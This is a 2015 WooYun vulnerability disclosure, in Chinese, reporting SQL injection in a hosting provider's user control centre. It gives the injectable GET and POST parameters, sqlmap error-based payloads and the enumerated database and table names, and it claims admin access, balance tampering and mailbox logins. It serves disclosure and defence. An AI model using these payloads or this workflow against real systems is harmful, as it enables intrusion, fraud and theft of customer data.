当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142467

漏洞标题:珠江互联用户控制中心多处sql注入(可入后台可加款 )+泄漏重要信息可登录邮箱等

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-09-23 21:42

修复时间:2015-11-09 17:16

公开时间:2015-11-09 17:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-23: 细节已通知厂商并且等待厂商处理中
2015-09-25: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-05: 细节向核心白帽子及相关领域专家公开
2015-10-15: 细节向普通白帽子公开
2015-10-25: 细节向实习白帽子公开
2015-11-09: 细节向公众公开

简要描述:

登录用户控制中心后有多处SQL注入!~~~可入后台可加款 +泄漏重要信息可登录邮箱等

详细说明:

首先用上次测试获取的几个用户测试登录
登录用户控制中心

0.jpg


登录后可以获取几个SQL注入点注入:
1、注入点一:

http://**.**.**.**/user/domain_list.php?iStatus=2 (GET)


iStatus存在注入

http://**.**.**.**/user/domain_list.php?iStatus=2'
返回错误
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => select count(*) from domain where 1 AND UserName='*******' AND iStatus='2'' ) [2] => Array ( [error] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2''' at line 1 ) [3] => Array ( [errno] => 1064 ) )


sqlmap测试

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: iStatus
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: iStatus=2' AND (SELECT 4685 FROM(SELECT COUNT(*),CONCAT(0x71786a687
1,(SELECT (CASE WHEN (4685=4685) THEN 1 ELSE 0 END)),0x7166757471,FLOOR(RAND(0)*
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'KvQP'='KvQP
---
[10:14:47] [INFO] testing MySQL
[10:14:48] [INFO] heuristics detected web page charset 'ascii'
[10:14:48] [WARNING] reflective value(s) found and filtering out
[10:14:48] [INFO] confirming MySQL
[10:14:48] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[10:14:48] [INFO] fetching current user
[10:14:48] [INFO] resumed: gz3721@%
current user:    'gz3721@%'
[10:14:48] [INFO] fetching current database
[10:14:48] [INFO] resumed: gz3721
current database:    'gz3721'
[10:14:48] [INFO] testing if current user is DBA
[10:14:48] [INFO] fetching current user
current user is DBA:    False
database management system users [1]:
[*] 'gz3721'@'%'
available databases [2]:
[*] gz3721
[*] information_schema
Database: gz3721
[27 tables]
+--------------+
| 400          |
| database     |
| domain       |
| order        |
| admins       |
| config       |
| dcontact     |
| doc          |
| email        |
| financial    |
| getpwd       |
| host         |
| mohost       |
| news         |
| nicebox      |
| nicecall     |
| onlinepay    |
| payment_type |
| products     |
| qq           |
| question     |
| secu_class   |
| security     |
| server       |
| server_old   |
| sms          |
| users        |
+--------------+
Database: gz3721
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| doc          | 247     |
| products     | 227     |
| security     | 48      |
| question     | 46      |
| config       | 33      |
| financial    | 23      |
| users        | 18      |
| secu_class   | 14      |
| `order`      | 13      |
| onlinepay    | 12      |
| news         | 11      |
| getpwd       | 7       |
| `domain`     | 6       |
| dcontact     | 6       |
| payment_type | 5       |
| host         | 3       |
| admins       | 2       |
| email        | 2       |
| qq           | 1       |
| server       | 1       |
+--------------+---------+


可获取信息进入管理后台,可以利用敏感信息进入邮箱。

1.jpg


2.jpg


3.jpg


4.jpg


5.jpg


2、注入点2:

http://**.**.**.**/user/domain_list.php (POST)
keyword=111
http://**.**.**.**/user/host_list.php (POST)
keyword=222
http://**.**.**.**/user/mohost_list.php (POST)
keyword=333
http://**.**.**.**/user/email_list.php (POST)
keyword=444
……
http://**.**.**.**/user/host_list.php (POST)
keyword=999
http://**.**.**.**/user/order_list.php(POST)
keyword=1234
http://**.**.**.**/user/fin_list.php (POST)keyword=2345
http://**.**.**.**/user/infolist.php (POST)keyword=12345


等等,均keyword存在注入

POST parameter 'keyword' is vulnerable. Do you want to keep testing the others (
if any)? [y/N] y
sqlmap identified the following injection points with a total of 35 HTTP(s) requ
ests:
---
Place: POST
Parameter: keyword
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: keyword=111') AND (SELECT 7427 FROM(SELECT COUNT(*),CONCAT(0x716964
6471,(SELECT (CASE WHEN (7427=7427) THEN 1 ELSE 0 END)),0x7164796f71,FLOOR(RAND(
0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('Rdzk'='Rdzk
---
[18:17:41] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
[18:17:41] [INFO] fetching current user
[18:17:41] [INFO] retrieved: gz3721@%
current user:    'gz3721@%'
[18:17:41] [INFO] fetching current database
[18:17:41] [INFO] retrieved: gz3721
current database:    'gz3721'
[18:17:41] [INFO] testing if current user is DBA
[18:17:41] [INFO] fetching current user
current user is DBA:    False

漏洞证明:

database management system users [1]:
[*] 'gz3721'@'%'
available databases [2]:
[*] gz3721
[*] information_schema

修复方案:

过滤修复

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-09-25 17:15

厂商回复:

CNVD确认并复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。

最新状态:

暂无